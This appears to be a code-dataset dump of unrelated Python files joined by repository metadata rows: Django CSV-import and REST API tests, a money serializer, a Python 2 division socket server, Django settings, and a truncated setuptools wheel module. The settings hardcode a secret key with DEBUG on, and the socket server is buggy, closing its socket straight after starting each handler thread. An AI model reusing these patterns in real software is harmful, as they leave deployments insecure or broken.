str_behavior = re.sub(r'\r', r'\n', str_behavior)
self.assertEqual(str_behavior, str_expected)
def test_003(self):
"""
必要なカラムタイトルが存在しない
"""
str_toImportCSVText = textwrap.dedent('''\
ID,著書名,著者名
5,"added, name",
''')
# 改行 コードを `\r\n` に統一
str_toImportCSVText = re.sub(r'\r\n', r'\n', str_toImportCSVText)
str_toImportCSVText = re.sub(r'\r', r'\n', str_toImportCSVText)
str_toImportCSVText = re.sub(r'\n', r'\r\n', str_toImportCSVText)
obj_csvfile = ContentFile(str_toImportCSVText)
obj_csvfile.name = 'books.csv'
dict_toImportData = {
'file': obj_csvfile,
'mode': 'update',
}
obj_response = self.client.post('/import_from_csv/', data = dict_toImportData)
self.assertEqual(obj_response.status_code, 302)
self.assertEqual(obj_response.url, '/')
obj_response = self.client.get('/export_as_csv/')
str_expected = textwrap.dedent('''\
ID,著書名,著者名,編集者名
1,book A,author A,
2,book B,author B,
3,book C,author C,
4,book D,,"created editor A,created editor B"
''')
# 改行 コードを `\n` に統一
str_expected = re.sub(r'\r\n', r'\n', str_expected)
str_expected = re.sub(r'\r', r'\n', str_expected)
str_behavior = obj_response.content.decode('utf-8-sig')
str_behavior = re.sub(r'\r\n', r'\n', str_behavior)
str_behavior = re.sub(r'\r', r'\n', str_behavior)
self.assertEqual(str_behavior, str_expected)
def test_004(self):
"""
バリデーションエラーとなるレコードが一部存在する
"""
str_toImportCSVText = textwrap.dedent('''\
ID,著書名,著者名,編集者名
5,"added, name",author C,"created editor A,created editor B"
6,added name,author D,
7,added name,,\\
8,added name,,\\a
9,added name,,created editor C
''')
# 改行 コードを `\r\n` に統一
str_toImportCSVText = re.sub(r'\r\n', r'\n', str_toImportCSVText)
str_toImportCSVText = re.sub(r'\r', r'\n', str_toImportCSVText)
str_toImportCSVText = re.sub(r'\n', r'\r\n', str_toImportCSVText)
obj_csvfile = ContentFile(str_toImportCSVText)
obj_csvfile.name = 'books.csv'
dict_toImportData = {
'file': obj_csvfile,
'mode': 'update',
}
obj_response = self.client.post('/import_from_csv/', data = dict_toImportData)
self.assertEqual(obj_response.status_code, 302)
self.assertEqual(obj_response.url, '/')
obj_response = self.client.get('/export_as_csv/')
str_expected = textwrap.dedent('''\
ID,著書名,著者名,編集者名
1,book A,author A,
2,book B,author B,
3,book C,author C,
4,book D,,"created editor A,created editor B"
5,"added, name",author C,"created editor A,created editor B"
''')
# 改行 コードを `\n` に統一
str_expected = re.sub(r'\r\n', r'\n', str_expected)
str_expected = re.sub(r'\r', r'\n', str_expected)
str_behavior = obj_response.content.decode('utf-8-sig')
str_behavior = re.sub(r'\r\n', r'\n', str_behavior)
str_behavior = re.sub(r'\r', r'\n', str_behavior)
self.assertEqual(str_behavior, str_expected)
def test_005(self):
"""
名前フィールドが他レコードと重複している
"""
str_toImportCSVText = textwrap.dedent('''\
ID,著書名,著者名,編集者名
5,book D,,
''')
# 改行 コードを `\r\n` に統一
str_toImportCSVText = re.sub(r'\r\n', r'\n', str_toImportCSVText)
str_toImportCSVText = re.sub(r'\r', r'\n', str_toImportCSVText)
str_toImportCSVText = re.sub(r'\n', r'\r\n', str_toImportCSVText)
obj_csvfile = ContentFile(str_toImportCSVText)
obj_csvfile.name = 'books.csv'
dict_toImportData = {
'file': obj_csvfile,
'mode': 'update',
}
obj_response = self.client.post('/import_from_csv/', data = dict_toImportData)
self.assertEqual(obj_response.status_code, 302)
self.assertEqual(obj_response.url, '/')
obj_response = self.client.get('/export_as_csv/')
str_expected = textwrap.dedent('''\
ID,著書名,著者名,編集者名
1,book A,author A,
2,book B,author B,
3,book C,author C,
4,book D,,"created editor A,created editor B"
''')
# 改行 コードを `\n` に統一
str_expected = re.sub(r'\r\n', r'\n', str_expected)
str_expected = re.sub(r'\r', r'\n', str_expected)
str_behavior = obj_response.content.decode('utf-8-sig')
str_behavior = re.sub(r'\r\n', r'\n', str_behavior)
str_behavior = re.sub(r'\r', r'\n', str_behavior)
self.assertEqual(str_behavior, str_expected)
def test_006(self):
"""
置き換えモードで全て削除
"""
str_toImportCSVText = textwrap.dedent('''\
ID,著書名,著者名,編集者名
''')
# 改行 コードを `\r\n` に統一
str_toImportCSVText = re.sub(r'\r\n', r'\n', str_toImportCSVText)
str_toImportCSVText = re.sub(r'\r', r'\n', str_toImportCSVText)
str_toImportCSVText = re.sub(r'\n', r'\r\n', str_toImportCSVText)
obj_csvfile = ContentFile(str_toImportCSVText)
obj_csvfile.name = 'books.csv'
dict_toImportData = {
'file': obj_csvfile,
'mode': 'replace',
}
obj_response = self.client.post('/import_from_csv/', data = dict_toImportData)
self.assertEqual(obj_response.status_code, 302)
self.assertEqual(obj_response.url, '/')
obj_response = self.client.get('/export_as_csv/')
# 改行 コードを `\n` に統一
str_expected = re.sub(r'\r\n', r'\n', str_toImportCSVText)
str_expected = re.sub(r'\r', r'\n', str_expected)
str_behavior = obj_response.content.decode('utf-8-sig')
str_behavior = re.sub(r'\r\n', r'\n', str_behavior)
str_behavior = re.sub(r'\r', r'\n', str_behavior)
self.assertEqual(str_behavior, str_expected)
def test_007(self):
"""
デッドロックの発生(既定回数内)
"""
str_toImportCSVText = textwrap.dedent('''\
ID,著書名,著者名,編集者名
5,added name,,
''')
# 改行 コードを `\r\n` に統一
str_toImportCSVText = re.sub(r'\r\n', r'\n', str_toImportCSVText)
str_toImportCSVText = re.sub(r'\r', r'\n', str_toImportCSVText)
str_toImportCSVText = re.sub(r'\n', r'\r\n', str_toImportCSVText)
obj_csvfile = ContentFile(str_toImportCSVText)
obj_csvfile.name = 'books.csv'
dict_toImportData = {
'file': obj_csvfile,
'mode': 'update',
}
with mock.patch(
target = 'index.views.Book.objects.update_or_create',
side_effect =
[OperationalError('database is locked')] * (INT_TIMES_OF_RETRYING_CAUSE_OF_DEADLOCK - 1) +
[Book.objects.update_or_create(
id = 5,
defaults = {
'name': 'added name',
'author': None
}
)],
):
obj_response = self.client.post('/import_from_csv/', data = dict_toImportData)
self.assertEqual(obj_response.status_code, 302)
self.assertEqual(obj_response.url, '/')
obj_response = self.client.get('/export_as_csv/')
str_expected = textwrap.dedent('''\
ID,著書名,著者名,編集者名
1,book A,author A,
2,book B,author B,
3,book C,author C,
4,book D,,"created editor A,created editor B"
5,added name,,
''')
# 改行 コードを `\n` に統一
str_expected = re.sub(r'\r\n', r'\n', str_expected)
str_expected = re.sub(r'\r', r'\n', str_expected)
str_behavior = obj_response.content.decode('utf-8-sig')
str_behavior = re.sub(r'\r\n', r'\n', str_behavior)
str_behavior = re.sub(r'\r', r'\n', str_behavior)
self.assertEqual(str_behavior, str_expected)
def test_008(self):
"""
デッドロックの発生(既定回数超過)
"""
str_toImportCSVText = textwrap.dedent('''\
ID,著書名,著者名,編集者名
5,added name,,
''')
# 改行 コードを `\r\n` に統一
str_toImportCSVText = re.sub(r'\r\n', r'\n', str_toImportCSVText)
str_toImportCSVText = re.sub(r'\r', r'\n', str_toImportCSVText)
str_toImportCSVText = re.sub(r'\n', r'\r\n', str_toImportCSVText)
obj_csvfile = ContentFile(str_toImportCSVText)
obj_csvfile.name = 'books.csv'
dict_toImportData = {
'file': obj_csvfile,
'mode': 'update',
}
with mock.patch(
target = 'index.views.Book.objects.update_or_create',
side_effect =
[OperationalError('database is locked')] * INT_TIMES_OF_RETRYING_CAUSE_OF_DEADLOCK,
):
obj_response = self.client.post('/import_from_csv/', data = dict_toImportData)
self.assertEqual(obj_response.status_code, 302)
self.assertEqual(obj_response.url, '/')
obj_response = self.client.get('/export_as_csv/')
str_expected = textwrap.dedent('''\
ID,著書名,著者名,編集者名
1,book A,author A,
2,book B,author B,
3,book C,author C,
4,book D,,"created editor A,created editor B"
''')
# 改行 コードを `\n` に統一
str_expected = re.sub(r'\r\n', r'\n', str_expected)
str_expected = re.sub(r'\r', r'\n', str_expected)
str_behavior = obj_response.content.decode('utf-8-sig')
str_behavior = re.sub(r'\r\n', r'\n', str_behavior)
str_behavior = re.sub(r'\r', r'\n', str_behavior)
self.assertEqual(str_behavior, str_expected)
class BookCreateAPIViewTest(TestCase):
""" BookCreateAPIView """
def setUp(self):
# Force Login
obj_user = User.objects.create_user(
username = 'tester',
password = '0123'
)
self.client.force_login(obj_user)
self.obj_token = TokenForRESTAPI.objects.create(
user = obj_user,
expired_date = make_aware(datetime.datetime.now()) + datetime.timedelta(days = 7) # 7 日加算
)
def test_001(self):
"""
名前の重複
"""
Book.objects.create(
name = 'created book',
author = None,
)
str_input = textwrap.dedent('''\
{
"books": [
{
"name": "created book",
"author": ""
}
]
}
''')
obj_response = self.client.post(
'/api/v1/books/create/',
HTTP_AUTHORIZATION = f'{STR_ATTRIBUTE_KEYWORD_FOR_TOKEN} {self.obj_token.key}',
data = str_input,
content_type = 'application/json',
)
self.assertContains(obj_response, 'この 名前 を持った Book が既に存在します。', status_code = 400)
def test_002(self):
"""
存在しない著者名
"""
str_input = textwrap.dedent('''\
{
"books": [
{
"name": "created book",
"author": "Author A"
}
]
}
''')
obj_response = self.client.post(
'/api/v1/books/create/',
HTTP_AUTHORIZATION = f'{STR_ATTRIBUTE_KEYWORD_FOR_TOKEN} {self.obj_token.key}',
data = str_input,
content_type = 'application/json',
)
self.assertContains(obj_response, '指定された著者名 `Author A` は存在しません。', status_code = 400)
def test_003(self):
"""
author フィールドの指定
"""
Author.objects.create(
name = 'Author A',
birthday = datetime.date(1999, 12, 24),
)
str_input = textwrap.dedent('''\
{
"books": [
{
"name": "created book",
"author": "Author A"
}
]
}
''')
obj_response = self.client.post(
'/api/v1/books/create/',
HTTP_AUTHORIZATION = f'{STR_ATTRIBUTE_KEYWORD_FOR_TOKEN} {self.obj_token.key}',
data = str_input,
content_type = 'application/json',
)
self.assertEqual(obj_response.status_code, 200)
self.assertEqual(Book.objects.get(name = 'created book').author.birthday, datetime.date(1999, 12, 24))
def test_004(self):
"""
author フィールドの未指定
"""
str_input = textwrap.dedent('''\
{
"books": [
{
"name": "created book"
}
]
}
''')
obj_response = self.client.post(
'/api/v1/books/create/',
HTTP_AUTHORIZATION = f'{STR_ATTRIBUTE_KEYWORD_FOR_TOKEN} {self.obj_token.key}',
data = str_input,
content_type = 'application/json',
)
self.assertEqual(obj_response.status_code, 200)
self.assertEqual(Book.objects.get(name = 'created book').author, None)
def test_005(self):
"""
author フィールドの空文字指定
"""
str_input = textwrap.dedent('''\
{
"books": [
{
"name": "created book",
"author": ""
}
]
}
''')
obj_response = self.client.post(
'/api/v1/books/create/',
HTTP_AUTHORIZATION = f'{STR_ATTRIBUTE_KEYWORD_FOR_TOKEN} {self.obj_token.key}',
data = str_input,
content_type = 'application/json',
)
self.assertEqual(obj_response.status_code, 200)
self.assertEqual(Book.objects.get(name = 'created book').author, None)
def test_006(self):
"""
存在しない編集者名
"""
str_input = textwrap.dedent('''\
{
"books": [
{
"name": "created book",
"editors": [
"editor A"
]
}
]
}
''')
obj_response = self.client.post(
'/api/v1/books/create/',
HTTP_AUTHORIZATION = f'{STR_ATTRIBUTE_KEYWORD_FOR_TOKEN} {self.obj_token.key}',
data = str_input,
content_type = 'application/json',
)
self.assertContains(obj_response, '指定された編集者名 `editor A` は存在しません。', status_code = 400)
def test_007(self):
"""
editors フィールドの指定
"""
Editor.objects.create(
name = 'Editor A',
sex = Editor.Sex.FEMALE,
)
Editor.objects.create(
name = 'Editor B',
sex = None,
)
str_input = textwrap.dedent('''\
{
"books": [
{
"name": "created book",
"editors": [
"Editor A",
"Editor B"
]
}
]
}
''')
obj_response = self.client.post(
'/api/v1/books/create/',
HTTP_AUTHORIZATION = f'{STR_ATTRIBUTE_KEYWORD_FOR_TOKEN} {self.obj_token.key}',
data = str_input,
content_type = 'application/json',
)
self.assertEqual(obj_response.status_code, 200)
self.assertEqual(Book.objects.get(name = 'created book').editors.all()[0].name, 'Editor A')
self.assertEqual(Book.objects.get(name = 'created book').editors.all()[1].name, 'Editor B')
def test_008(self):
"""
editors フィールドの空指定
"""
str_input = textwrap.dedent('''\
{
"books": [
{
"name": "created book",
"editors": []
}
]
}
''')
obj_response = self.client.post(
'/api/v1/books/create/',
HTTP_AUTHORIZATION = f'{STR_ATTRIBUTE_KEYWORD_FOR_TOKEN} {self.obj_token.key}',
data = str_input,
content_type = 'application/json',
)
self.assertEqual(obj_response.status_code, 200)
self.assertEqual(Book.objects.get(name = 'created book').editors.all().count(), 0)
class BookListAPIViewTest(TestCase):
""" BookListAPIView """
def setUp(self):
# Force Login
obj_user = User.objects.create_user(
username = 'tester',
password = '0123'
)
self.client.force_login(obj_user)
self.obj_token = TokenForRESTAPI.objects.create(
user = obj_user,
expired_date = make_aware(datetime.datetime.now()) + datetime.timedelta(days = 7) # 7 日加算
)
def test_001(self):
"""
クエリ文字列のバリデーション OK
"""
obj_authorA, _ = Author.objects.update_or_create(
id = 1,
defaults = {
'name': 'author A',
}
)
obj_authorB, _ = Author.objects.update_or_create(
id = 2,
defaults = {
'name': 'author B',
'birthday': None,
}
)
obj_authorC, _ = Author.objects.update_or_create(
id = 3,
defaults = {
'name': 'author C',
'birthday': datetime.date(2000, 10 ,13),
}
)
Book.objects.update_or_create(
id = 1,
defaults = {
'name': 'book A',
'author': obj_authorA
}
)
Book.objects.update_or_create(
id = 2,
defaults = {
'name': 'book B',
'author': obj_authorB
}
)
editor1, _ = Editor.objects.update_or_create(
id = 1,
defaults = {
'name': 'createdEditor1',
'sex': Editor.Sex.FEMALE,
}
)
editor2, _ = Editor.objects.update_or_create(
id = 2,
defaults = {
'name': 'createdEditor2',
'sex': None,
}
)
obj_id3, _ = Book.objects.update_or_create(
id = 3,
defaults = {
'name': 'book C',
'author': obj_authorC
}
)
obj_id3.editors.set([editor1, editor2])
obj_id3.save()
Book.objects.update_or_create(
id = 4,
defaults = {
'name': 'book D',
'author': None
}
)
dict_expected = {
'books': [
{
'id': 3,
'name': 'book C',
'author': 'author C',
'editors': [
"createdEditor1",
"createdEditor2"
]
},
]
}
obj_response = self.client.get(f'/api/v1/books.json/?id={obj_id3.id}&name={obj_id3.name}', HTTP_AUTHORIZATION = f'{STR_ATTRIBUTE_KEYWORD_FOR_TOKEN} {self.obj_token.key}')
self.assertEqual(obj_response.status_code, 200)
self.assertEqual(json.loads(obj_response.content.decode('utf-8')), dict_expected)
class BookUpdateAPIViewTest(TestCase):
""" BookUpdateAPIView """
def setUp(self):
# Force Login
obj_user = User.objects.create_user(
username = 'tester',
password = '0123'
)
self.client.force_login(obj_user)
self.obj_token = TokenForRESTAPI.objects.create(
user = obj_user,
expired_date = make_aware(datetime.datetime.now()) + datetime.timedelta(days = 7) # 7 日加算
)
Author.objects.update_or_create(
id = 1,
defaults = {
'name': 'author A',
}
)
Book.objects.update_or_create(
id = 1,
defaults = {
'name': 'created book 1',
'author': None,
}
)
Book.objects.update_or_create(
id = 2,
defaults = {
'name': 'created book 2',
'author': None,
}
)
def test_001(self):
"""
名前の重複
"""
str_input = textwrap.dedent('''\
{
"books": [
{
"id": 2,
"name": "created book 1",
"author": ""
}
]
}
''')
obj_response = self.client.post(
'/api/v1/books/update/',
HTTP_AUTHORIZATION = f'{STR_ATTRIBUTE_KEYWORD_FOR_TOKEN} {self.obj_token.key}',
data = str_input,
content_type = 'application/json',
)
self.assertContains(obj_response, 'この 名前 を持った Book が既に存在します。', status_code = 400)
def test_002(self):
"""
著者指定
"""
str_input = textwrap.dedent('''\
{
"books": [
{
"id": 2,
"name": "updated book",
"author": "author A"
}
]
}
''')
obj_response = self.client.post(
'/api/v1/books/update/',
HTTP_AUTHORIZATION = f'{STR_ATTRIBUTE_KEYWORD_FOR_TOKEN} {self.obj_token.key}',
data = str_input,
content_type = 'application/json',
)
self.assertEqual(obj_response.status_code, 200)
self.assertEqual(Book.objects.get(name = 'updated book').author.name, 'author A')
def test_003(self):
"""
存在しない著者名
"""
str_input = textwrap.dedent('''\
{
"books": [
{
"id": 2,
"name": "updated book",
"author": "author B"
}
]
}
''')
obj_response = self.client.post(
'/api/v1/books/update/',
HTTP_AUTHORIZATION = f'{STR_ATTRIBUTE_KEYWORD_FOR_TOKEN} {self.obj_token.key}',
data = str_input,
content_type = 'application/json',
)
self.assertContains(obj_response, '指定された著者名 `author B` は存在しません。', status_code = 400)
def test_004(self):
"""
著者名の未指定
"""
str_input = textwrap.dedent('''\
{
"books": [
{
"id": 2,
"name": "updated book"
}
]
}
''')
obj_response = self.client.post(
'/api/v1/books/update/',
HTTP_AUTHORIZATION = f'{STR_ATTRIBUTE_KEYWORD_FOR_TOKEN} {self.obj_token.key}',
data = str_input,
content_type = 'application/json',
)
self.assertEqual(obj_response.status_code, 200)
self.assertEqual(Book.objects.get(name = 'updated book').author, None)
def test_005(self):
"""
著者名の空文字指定
"""
str_input = textwrap.dedent('''\
{
"books": [
{
"id": 2,
"name": "updated book",
"author": ""
}
]
}
''')
obj_response = self.client.post(
'/api/v1/books/update/',
HTTP_AUTHORIZATION = f'{STR_ATTRIBUTE_KEYWORD_FOR_TOKEN} {self.obj_token.key}',
data = str_input,
content_type = 'application/json',
)
self.assertEqual(obj_response.status_code, 200)
self.assertEqual(Book.objects.get(name = 'updated book').author, None)
def test_006(self):
"""
存在しない編集者名
"""
str_input = textwrap.dedent('''\
{
"books": [
{
"id": 2,
"name": "updated book",
"editors": [
"Editor A"
]
}
]
}
''')
obj_response = self.client.post(
'/api/v1/books/update/',
HTTP_AUTHORIZATION = f'{STR_ATTRIBUTE_KEYWORD_FOR_TOKEN} {self.obj_token.key}',
data = str_input,
content_type = 'application/json',
)
self.assertEqual(obj_response.status_code, 400)
self.assertEqual(Book.objects.get(name = 'created book 1').editors.all().first(), None)
def test_007(self):
"""
editors フィールドの指定
"""
Editor.objects.create(
name = 'Editor A',
sex = Editor.Sex.FEMALE,
)
Editor.objects.create(
name = 'Editor B',
sex = None,
)
str_input = textwrap.dedent('''\
{
"books": [
{
"id": 2,
"name": "updated book",
"editors": [
"Editor A",
"Editor B"
]
}
]
}
''')
obj_response = self.client.post(
'/api/v1/books/update/',
HTTP_AUTHORIZATION = f'{STR_ATTRIBUTE_KEYWORD_FOR_TOKEN} {self.obj_token.key}',
data = str_input,
content_type = 'application/json',
)
self.assertEqual(obj_response.status_code, 200)
self.assertEqual(Book.objects.get(name = 'updated book').editors.all()[0].name, 'Editor A')
self.assertEqual(Book.objects.get(name = 'updated book').editors.all()[1].name, 'Editor B')
def test_008(self):
"""
editors フィールドの空指定
"""
str_input = textwrap.dedent('''\
{
"books": [
{
"id": 2,
"name": "updated book",
"editors": []
}
]
}
''')
obj_response = self.client.post(
'/api/v1/books/update/',
HTTP_AUTHORIZATION = f'{STR_ATTRIBUTE_KEYWORD_FOR_TOKEN} {self.obj_token.key}',
data = str_input,
content_type = 'application/json',
)
self.assertEqual(obj_response.status_code, 200)
self.assertEqual(Book.objects.get(name = 'updated book').editors.all().count(), 0)
class BookDeleteAPIViewTest(TestCase):
""" BookDeleteAPIView """
def setUp(self):
# Force Login
obj_user = User.objects.create_user(
username = 'tester',
password = '0123'
)
self.client.force_login(obj_user)
self.obj_token = TokenForRESTAPI.objects.create(
user = obj_user,
expired_date = make_aware(datetime.datetime.now()) + datetime.timedelta(days = 7) # 7 日加算
)
self.obj_book1, _ = Book.objects.update_or_create(
id = 1,
defaults = {
'name': 'created book 1',
'author': None,
}
)
self.obj_book2, _ = Book.objects.update_or_create(
id = 2,
defaults = {
'name': 'created book 2',
'author': None,
}
)
def test_001(self):
"""
削除成功
"""
obj_response = self.client.delete(
f'/api/v1/books/{self.obj_book1.id}/delete/',
HTTP_AUTHORIZATION = f'{STR_ATTRIBUTE_KEYWORD_FOR_TOKEN} {self.obj_token.key}'
)
self.assertEqual(obj_response.status_code, 200)
self.assertEqual(Book.objects.filter(id = self.obj_book1.id).first(), None)
def test_002(self):
"""
削除失敗
"""
obj_response = self.client.delete(
f'/api/v1/books/3/delete/',
HTTP_AUTHORIZATION = f'{STR_ATTRIBUTE_KEYWORD_FOR_TOKEN} {self.obj_token.key}'
)
self.assertContains(obj_response, 'Specified Book ID: 3 not found.', status_code = 404)
| [
"38835246+yakenohara@users.noreply.github.com"
] | 38835246+yakenohara@users.noreply.github.com |
14064a81e2b808d01e665ab242a0573a2ea70c9c | e3c1293330abb922eeee1c6d0b0a3ecfde09ddbc | /django_money_example/core/serializers.py | 2aa137c888132e20b6bd5e5a1ec17a4cc6fe5ee2 | [] | no_license | jrocketfingers/django-money-example | 4a0cc70afa86b41e1fe3d692882012c3fd005c47 | ecf673b48ce2738aa5b3ea8122b32669a591c74e | refs/heads/master | 2022-07-07T22:58:16.790778 | 2019-11-27T09:51:26 | 2019-11-27T09:51:26 | 223,743,533 | 1 | 0 | null | 2021-02-01T03:35:02 | 2019-11-24T12:51:47 | Python | UTF-8 | Python | false | false | 414 | py | from djmoney.contrib.django_rest_framework.fields import MoneyField
from rest_framework import serializers
from core import models
class ExampleSerializer(serializers.ModelSerializer):
display_amount = MoneyField(source="display", currency_field_name="display_currency")
class Meta:
model = models.ExampleModelWithMoneyFieldFromTheGetGo
fields = ("display_amount", "display_currency",)
| [
"developer94@gmail.com"
] | developer94@gmail.com |
73763af66d53b49e26248a0b1e2ab7d4457fd071 | f578b4e325c0b6fae17973f7228bafb03c1a2c43 | /Taller9/server_dividir.py | e0bcda91e13d0a02c8547fe765feb3dbc18943d7 | [] | no_license | Kalugy/Distribuidos | 53e21e2a1d6ff0450547c0c0ad8705c68caf9282 | d4f790511391d8cd423b53b630e61d68d94aa6c9 | refs/heads/master | 2020-03-26T22:50:30.255335 | 2018-12-19T22:10:55 | 2018-12-19T22:10:55 | 145,491,010 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,015 | py | import socket
import sys
import thread
import math
def dividir(numero1, numero2):
return numero1/numero2
s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s1.bind(('', 7500))
s1.listen(10)
def connection(sc, addr):
num=str(sc1.recv(1024))
palabra1=""
palabra2=""
palabra3=""
cuenta=0
contador=0
#cuando cuantas veces esta un signo dentro de la palabra y las separa segun la cantidad de signos
for carac in num:
if carac == ' ':
cuenta+=1
else:
contador+=1
if cuenta==0:
palabra1+=carac
if cuenta==1:
palabra2+=carac
if cuenta==2:
palabra3+=carac
suman = str(dividir(float(palabra1), float(palabra3)))
print 'los numeros recibidos son: ' , palabra1, 'y', palabra3, 'y la dividir es: ', suman
sc1.send(suman)
print "respondiendo..."
while 1:
sc1, addr = s1.accept()
print "recibida conexion de la IP: " + str(addr[0]) + "puerto: " + str(addr[1])
print "\n"
thread.start_new_thread(connection,(sc1,addr))
sc1.close()
s1.close()
| [
"nico0829@utp.edu.co"
] | nico0829@utp.edu.co |
d06f05cbb6eeab2c73ba51f9a73a2e19cda51879 | 251a104dc767ec57a88d6504710091ace3ce5359 | /untitled3/settings.py | e7505be28e66b0f6284f29ef99f82bc9bfa11d2d | [] | no_license | katandser/Site_Django | e43399d44ed1f1df4f0024372231ea3db3da5ff0 | ae2df382fac579a73e0b960695e5e6becd07d139 | refs/heads/master | 2020-05-09T19:19:34.296717 | 2019-04-14T23:30:37 | 2019-04-14T23:30:37 | 181,374,862 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,173 | py | """
Django settings for untitled3 project.
Generated by 'django-admin startproject' using Django 2.2.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '@bq$b#=f^5opwd&7+w%j8f3+qfl23##ccrh38l%rd1m*rq8+ur'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'catalog.apps.CatalogConfig',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'untitled3.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')]
,
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'untitled3.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
| [
"katandser96@mail.ru"
] | katandser96@mail.ru |
3738260cd7566f69bb08576a36a0616524060ba0 | ed6625148299e759f39359db9f932dd391b8e86f | /personal_env/lib/python3.8/site-packages/setuptools/wheel.py | e17742f100132d61e0cf7083ef2ce3b873a0ef4a | [
"MIT"
] | permissive | jestinmwilson/personal-website | 128c4717b21fa6fff9df8295b1137f32bbe44b55 | 6e47a7f33ed3b1ca5c1d42c89c5380d22992ed74 | refs/heads/main | 2023-08-28T11:31:07.916714 | 2021-10-14T09:41:13 | 2021-10-14T09:41:13 | 414,847,553 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,675 | py | """Wheels support."""
from distutils.util import get_platform
from distutils import log
import email
import itertools
import os
import posixpath
import re
import zipfile
import pkg_resources
import setuptools
from pkg_resources import parse_version
from setuptools.extern.packaging.tags import sys_tags
from setuptools.extern.packaging.utils import canonicalize_name
from setuptools.extern.six import PY3
from setuptools.command.egg_info import write_requirements
__metaclass__ = type
WHEEL_NAME = re.compile(
r"""^(?P<project_name>.+?)-(?P<version>\d.*?)
((-(?P<build>\d.*?))?-(?P<py_version>.+?)-(?P<abi>.+?)-(?P<platform>.+?)
)\.whl$""",
re.VERBOSE).match
NAMESPACE_PACKAGE_INIT = '''\
try:
__import__('pkg_resources').declare_namespace(__name__)
except ImportError:
__path__ = __import__('pkgutil').extend_path(__path__, __name__)
'''
def unpack(src_dir, dst_dir):
'''Move everything under `src_dir` to `dst_dir`, and delete the former.'''
for dirpath, dirnames, filenames in os.walk(src_dir):
subdir = os.path.relpath(dirpath, src_dir)
for f in filenames:
src = os.path.join(dirpath, f)
dst = os.path.join(dst_dir, subdir, f)
os.renames(src, dst)
for n, d in reversed(list(enumerate(dirnames))):
src = os.path.join(dirpath, d)
dst = os.path.join(dst_dir, subdir, d)
if not os.path.exists(dst):
# Directory does not exist in destination,
# rename it and prune it from os.walk list.
os.renames(src, dst)
del dirnames[n]
# Cleanup.
for dirpath, dirnames, filenames in os.walk(src_dir, topdown=True):
assert not filenames
os.rmdir(dirpath)
class Wheel:
def __init__(self, filename):
match = WHEEL_NAME(os.path.basename(filename))
if match is None:
raise ValueError('invalid wheel name: %r' % filename)
self.filename = filename
for k, v in match.groupdict().items():
setattr(self, k, v)
def tags(self):
'''List tags (py_version, abi, platform) supported by this wheel.'''
return itertools.product(
self.py_version.split('.'),
self.abi.split('.'),
self.platform.split('.'),
)
def is_compatible(self):
'''Is the wheel is compatible with the current platform?'''
supported_tags = set((t.interpreter, t.abi, t.platform) for t in sys_tags())
return next((True for t in self.tags() if t in supported_tags), False)
def egg_name(self):
return pkg_resources.Distribution(
project_name=self.project_name, version=self.version,
platform=(None if self.platform == 'any' else get_platform()),
).egg_name() + '.egg'
def get_dist_info(self, zf):
# find the correct name of the .dist-info dir in the wheel file
for member in zf.namelist():
dirname = posixpath.dirname(member)
if (dirname.endswith('.dist-info') and
canonicalize_name(dirname).startswith(
canonicalize_name(self.project_name))):
return dirname
raise ValueError("unsupported wheel format. .dist-info not found")
def install_as_egg(self, destination_eggdir):
'''Install wheel as an egg directory.'''
with zipfile.ZipFile(self.filename) as zf:
self._install_as_egg(destination_eggdir, zf)
def _install_as_egg(self, destination_eggdir, zf):
dist_basename = '%s-%s' % (self.project_name, self.version)
dist_info = self.get_dist_info(zf)
dist_data = '%s.data' % dist_basename
egg_info = os.path.join(destination_eggdir, 'EGG-INFO')
self._convert_metadata(zf, destination_eggdir, dist_info, egg_info)
self._move_data_entries(destination_eggdir, dist_data)
self._fix_namespace_packages(egg_info, destination_eggdir)
@staticmethod
def _convert_metadata(zf, destination_eggdir, dist_info, egg_info):
def get_metadata(name):
with zf.open(posixpath.join(dist_info, name)) as fp:
value = fp.read().decode('utf-8') if PY3 else fp.read()
return email.parser.Parser().parsestr(value)
